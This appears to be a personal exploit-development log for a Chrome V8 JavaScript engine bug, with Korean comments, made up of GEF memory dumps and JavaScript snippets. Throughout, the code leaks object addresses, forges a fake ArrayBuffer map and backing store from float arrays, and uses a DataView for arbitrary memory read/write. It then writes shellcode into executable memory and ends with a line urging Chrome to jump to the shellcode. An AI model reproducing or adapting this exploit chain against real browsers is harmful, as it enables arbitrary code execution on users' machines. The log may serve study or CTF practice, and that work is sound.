[.] 1.ab_prot_addr: 0xaedb4791b49

gef➤  x/32gx 0xaedb4791b48-0x70
0xaedb4791ad8: 0x00000f52d2183179 0x00000aedb4791b21
0xaedb4791ae8: 0x00000c3bb5c02241 0x00000f52d2185fe1
0xaedb4791af8: 0x00000c3bb5c68ae9 0x00000aedb4783bf9
0xaedb4791b08: 0x00000c3bb5c04cf9 0x00000196d55d2200
0xaedb4791b18: 0x00000c3bb5c02311 0x00003b553b682309
0xaedb4791b28: 0x0000000300000000 0x0000000800000000
0xaedb4791b38: 0x00000c3bb5c02311 0x00000c3bb5c02311
0xaedb4791b48: 0x00000f52d2186039 0x00000c3bb5c02241
0xaedb4791b58: 0x00000c3bb5c02241 0x00000b29b95a39c9
0xaedb4791b68: 0x0000000000000000 0x0000000000000000


[.] 2.u2d(ab_map_obj_float[0x3]): 0xaedb4791b49


[.] 3.ab_map_obj_addr: 0x16929c50a621

gef➤  x/32gx 0x16929c50a620-0x40
0x16929c50a5e0: 0x00000f52d2183c79 0x00000c3bb5c02241
0x16929c50a5f0: 0x000016929c50a611 0x0000000600000000
0x16929c50a600: 0x00003b553b683f91 0x00000aedb47c9eb1
0x16929c50a610: 0x00003b553b682e09 0x0000000600000000
0x16929c50a620: 0xdaba0000daba0000 0x000900c01f000008
0x16929c50a630: 0x00000000082003ff 0x00000aedb4791b49      ; ab_proto_addr = read_obj_addr(ab.__proto__);
0x16929c50a640: 0x00000aedb4791ad9 0x0000000000000000   ; ab_constructor_addr = ab_proto_addr - 0x70;
0x16929c50a650: 0x00003b553b682519 0x41eb574000000000
0x16929c50a660: 0x00003b553b682519 0x41eb574000000000

[참조]

gef➤  x/20gx 0x0000358452d8ba80
0x358452d8ba80: 0x000023b229484569 0x0000125339f82241      ; 디버깅을 해보면 다른 값이 출력되나 첫번째 값으로 해도  ok
0x358452d8ba90: 0x0000125339f82241 0x0000358452d8ba41   ; 단, 다른 값을 사용하면 --allow_natives_syntax 는 꽥임
0x358452d8baa0: 0x0000000000000000 0x0000000c00000000
0x358452d8bab0: 0x0000000000000000 0x0000000000000000
0x358452d8bac0: 0x00000e2a9ea831d1 0x0000000000000003

 

gef➤  x/32gx 0x000023b229484568
0x23b229484568: 0x00000e2a9ea82259 0x000900c21b000008 ; 정상적으로 디버깅 한 값과 같음
0x23b229484578: 0x00000000082003ff 0x00001b050c00b471 ; ab .value
0x23b229484588: 0x00001b050c00b401 0x0000000000000000

 

 

        var nop = 0xdaba0000;
        var ab_map_obj = [
                nop,nop,
                0x1f000008,0x000900c0,0x082003ff,0x0,
                nop,nop,   // use ut32.prototype replace it
                nop,nop,0x0,0x0
        ]
        ab_proto_addr = read_obj_addr(ab.__proto__);
        ab_constructor_addr = ab_proto_addr - 0x70;
        //alert(ab_proto_addr.toString(16));
        ab_map_obj[0x6] = ab_proto_addr & 0xffffffff;
        ab_map_obj[0x7] = ab_proto_addr / 0x100000000;
        ab_map_obj[0x8] = ab_constructor_addr & 0xffffffff;
        ab_map_obj[0x9] = ab_constructor_addr / 0x100000000;
        float_arr = [];
        /*for(var i = 0;i < 0x100;i++){
                float_arr[i] = [1.1,1.1,1.1,1.1,1.1,1.1];
        }*/
        gc();
        var ab_map_obj_float = [1.1, 1.1, 1.1, 1.1, 1.1, 1.1];  //6개
        change_to_float(ab_map_obj,ab_map_obj_float);


[.] 4.fake_ab_float_addr: 0x16929c56d571

gef➤  x/32gx 0x16929c56d570-0x40
0x16929c56d530: 0x00000f52d2183c79 0x00000c3bb5c02241
0x16929c56d540: 0x000016929c56d561 0x0000000600000000
0x16929c56d550: 0x00003b553b683f91 0x00000aedb47d0091
0x16929c56d560: 0x00003b553b682e09 0x0000000600000000
0x16929c56d570: 0x000016929c50a621 0x000016929c50a621
0x16929c56d580: 0x000016929c50a621 0x0000400000000000      ; 버퍼길이
0x16929c56d590: 0x00000196d55e9ba0 0x0000000000000004
0x16929c56d5a0: 0x00003b553b682519 0x40b6929c50a62100
0x16929c56d5b0: 0x00003b553b682519 0xc1d8ebd677c00000

        var fake_ab = [
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                0x0,0x4000, /* buffer length */
                0x12345678,0x123,/* buffer address */
                0x4,0x0
        ]
        var fake_ab_float = [1.1,1.1,1.1,1.1,1.1,1.1];   //6개
        change_to_float(fake_ab,fake_ab_float);


[.] 5.fake_ab_float[4]: 0x12312345678

        fake_arraybuffer = double_arr42[1];
        fake_dv = new DataView(fake_arraybuffer,0,0x4000);

almost done!!


[.]shellcode_address_ref: 0x1f85944d4560
[.]shellcode_address_ref: 0x1f85944d4560

gef➤  x/32gx 0x1f85944d4560
0x1f85944d4560: 0x00000196d55e9ba0 0x00000c3bb5c02311
0x1f85944d4570: 0x00000f52d218ee31 0x00001f85944d45a1
0x1f85944d4580: 0x00001f85944d4961 0x0000000100000000
0x1f85944d4590: 0x00003b553b683f91 0x00000aedb47d8429
0x1f85944d45a0: 0x00003b553b682309 0x0000000300000000
0x1f85944d45b0: 0x0000000100000000 0x00000c3bb5c02311
0x1f85944d45c0: 0x00000c3bb5c02311 0x00003b553b682e09


[.]shellcode_address: 0x196d55e9ba0

gef➤  x/32gx 0x196d55e9ba0
0x196d55e9ba0: 0x90909090cccccccc 0x0f014f40f61f478b
0x196d55e9bb0: 0x708b4c000000c585 0x96d55e9b41b9483f
0x196d55e9bc0: 0x0f07483b48000001 0x4f8b48000000ba85


[.]shellcode write
[.]shellcode write
[*]go to shellcode plz,chrome!
